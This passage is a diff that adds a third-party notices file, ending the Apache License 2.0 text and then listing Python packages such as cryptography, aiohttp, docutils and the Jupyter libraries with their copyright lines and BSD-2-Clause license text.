+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+cryptography 36.0.1 - Apache-2.0 AND BSD-3-Clause AND Python-2.0
+
+
+Copyright (c) Individual contributors.
+Copyright 2001-2016 Python Software Foundation
+Copyright (c) 2001-2016 Python Software Foundation
+
+Apache-2.0 AND BSD-3-Clause AND Python-2.0
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+aiohttp 3.8.1 - Apache-2.0 AND MIT
+
+
+Copyright Fedor Indutny, 2018.
+copyright f'2013-2020, project
+
+Apache-2.0 AND MIT
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+packaging 21.3 - Apache-2.0 OR (Apache-2.0 AND BSD-2-Clause AND BSD-3-Clause)
+
+
+copyright 2014-2019
+Copyright (c) Donald Stufft and individual contributors.
+
+Apache-2.0 OR (Apache-2.0 AND BSD-2-Clause AND BSD-3-Clause)
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+appnope 0.1.2 - BSD-2-Clause
+
+
+Copyright (c) 2013 Min RK
+Copyright (c) 2013, Min Ragan-Kelley
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+colorama 0.4.4 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+decorator 5.1.0 - BSD-2-Clause
+
+
+Copyright (c) 2005-2018, Michele Simionato
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+docutils 0.17.1 - BSD-2-Clause
+
+
+(c) Item C.
+(c) David Goodger.
+(c) 2003 John Gruber
+copyright by Mark Pilgrim
+(c) 2004, 2007 Chad Miller.
+Copyright (c) Gunter Milde.
+Copyright (c) Alex Fernandez
+u'copyright' copyright', u'v
+(c) 2005 Jens Jorgen Mortensen
+u'copyright' u'copyright', u'd
+Copyright (c) 2001 Mark Pilgrim
+Copyright (c) 2010 Gunter Milde.
+Copyright (c) 2011 Gunter Milde.
+Copyright (c) 2015 Gunter Milde.
+Copyright 2004 by Enthought, Inc.
+Copyright copy 2003, BogusMegaCorp
+u'copyright' copyright', u'dedicat
+Copyright u00a9 2003, BogusMegaCorp
+Copyright 2001-2004 by David Goodger
+Copyright copy 2003 by John Q. Public
+Copyright (c) 2009,2010 Alex Fernandez
+Copyright (c) 2009-2011 Alex Fernandez
+Copyright (c) 2011, 2017 Gunter Milde.
+Copyright copy 2003, BogusMegaCorp (TM)
+Copyright (c) 2005, 2009, 2015 Gunter Milde
+copyright by Free Software Foundation, Inc.
+copyright', u'Xian Ci dedication', u'Gai Yao
+Copyright (c) 2001 Python Software Foundation
+copyright', u'Xian Ci dedication', u'Zhai Yao
+Copyright (c) 2016 David Goodger, Gunter Milde
+Copyright (c) 2003-2017 Free Software Foundation, Inc.
+Copyright (c) 2010-2012 Free Software Foundation, Inc.
+Copyright (c) 2003 John Gruber (http://daringfireball.net/)
+Copyright 2004 by Enthought, Inc. <http://www.enthought.com>
+Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam
+Copyright (c) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+copyright' u'Ban Quan , dedication' u'Xian Ci , abstract' u'Zhai Yao
+Copyright (c) 1995-2001 Corporation for National Research Initiatives
+copyright' u'Zhu Zuo Quan , dedication' u'Xian Ci , abstract' u'Gai Yao
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+enum34 1.1.10 - BSD-2-Clause
+
+
+Copyright (c) 2013, Ethan Furman.
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+ipwhois 1.2.0 - BSD-2-Clause
+
+
+Copyright (c) 2017-2019 Philip Hane
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+ipykernel 6.6.1 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+isodate 0.6.1 - BSD-2-Clause
+
+
+Copyright 2009, Gerhard Weis
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+jupyter-client 7.1.0 - BSD-2-Clause
+
+
+Copyright (c) 2010 The IPython Team
+Copyright (c) 2011- PyZMQ Developers
+Copyright (c) Jupyter Development Team.
+copyright 2015, Jupyter Development Team
+Copyright (c) The Jupyter Development Team
+Copyright (c) 2015-, Jupyter Development Team
+Copyright (c) 2010-2011 IPython Development Team
+Copyright (c) 2001-2015, IPython Development Team
+Copyright (c) 2003-2007 Robey Pointer <robeypointer@gmail.com>
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+jupyter-core 4.9.1 - BSD-2-Clause
+
+
+Copyright (c) IPython Development Team.
+Copyright (c) Jupyter Development Team.
+copyright 2015, Jupyter Development Team
+Copyright (c) 2015-, Jupyter Development Team
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+jupyterlab-widgets 1.0.2 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+kiwisolver 1.3.2 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+lxml 4.7.1 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+markupsafe 2.0.1 - BSD-2-Clause
+
+
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+mistune 0.8.4 - BSD-2-Clause
+
+
+(c) 2004 Foo Corporation
+Copyright (c) 2014 - 2015, Hsiaoming Yang
+copyright (c) 2014 - 2018 by Hsiaoming Yang.
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+mock 4.0.3 - BSD-2-Clause
+
+
+Copyright (c) 2007-2012 Michael Foord
+Copyright (c) 2003-2013, Michael Foord
+
+Copyright (c) <year> <owner> . All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+
+   1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+
+   2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+
